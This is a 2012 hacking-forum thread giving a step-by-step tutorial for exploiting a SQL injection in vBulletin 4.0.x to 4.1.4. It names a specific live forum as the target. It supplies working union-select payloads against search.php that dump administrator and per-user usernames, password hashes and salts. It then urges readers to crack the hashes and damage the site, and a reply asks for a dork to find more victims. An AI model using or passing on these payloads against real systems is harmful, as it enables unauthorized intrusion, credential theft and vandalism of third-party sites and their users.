+- Sinisterly (https://sinister.ly)
+-- Forum: Hacking (https://sinister.ly/Forum-Hacking)
+--- Forum: Website & Server Hacking (https://sinister.ly/Forum-Website-Server-Hacking)
+--- Thread: Vbulletin 4.0.x => 4.1.4 tutorial EXPLOIT (/Thread-Vbulletin-4-0-x-4-1-4-tutorial-EXPLOIT)
Vbulletin 4.0.x => 4.1.4 tutorial EXPLOIT - princeshama - 03-27-2012
Vbulletin 4.0.x => 4.1.4 tutorial
Welcome to my tutorial on how to use the vB exploit v4.0.x => 4.1.4
This may be patched on some forums with the version v.4.0.x - 4.1.4
100% MADE BY ME ENVYMEBRO, ENVY.
Target:
http://forum.swagms.info/
Yes, its a maplestory private server forum version 4.1.4, its exploitable .
First you will obviously need to register and go to group.php
Target:
http://forum.swagms.info/group.php
Since i already made a group and a discussion, there's no need for you to make one.
The discussion I made is called "awesome1337" so now go to search.php .
Target:
http://forum.swagms.info/search.php
and tick the following ...
-
tick group messages
tick exact name
search awesome1337
![[Image: 115.png]](http://i43.servimg.com/u/f43/12/53/66/00/115.png)
When you click search, quickly open HTTP headers and click capture on and you should get the page information, click on any line and type in "ty" to find the type=%query information...it should look like this
![[Image: 214.png]](http://i43.servimg.com/u/f43/12/53/66/00/214.png)
Now, as it is highlighted already click replay to put in the exploit SQL injection :happycry:
You should get something like this
![[Image: 315.png]](http://i43.servimg.com/u/f43/12/53/66/00/315.png)
Now all you have to do is add the SQL injection code to it, which is
Code:
&messagegroupid[0]=1 ) union select group_concat(username,0x3a,password,0x3a,salt) from user where usergroupid=6#add it in to the LIVE HTTP HEADERS
![[Image: 414.png]](http://i43.servimg.com/u/f43/12/53/66/00/414.png)
and CLICK REPLAY
![[Image: 513.png]](http://i43.servimg.com/u/f43/12/53/66/00/513.png)
![[Image: 612.png]](http://i43.servimg.com/u/f43/12/53/66/00/612.png)
s you can see, I successfully exploited the forum and now I have the Administrators passwords which are in a HASH, from there your on your own cracking the hashes and ****ing up the forum if you wish. I suggest using PasswordPro to crack the hashes.
To Hack a single User use this code
Code:
&messagegroupid[0]=1 ) union select group_concat(username,0x3a,password,0x3a,salt) from user where userid=1#change userid to whatever the users id
RE: Vbulletin 4.0.x => 4.1.4 tutorial EXPLOIT - Synchro - 01-23-2013
Very detailed will test it, if you could post a dork will be great.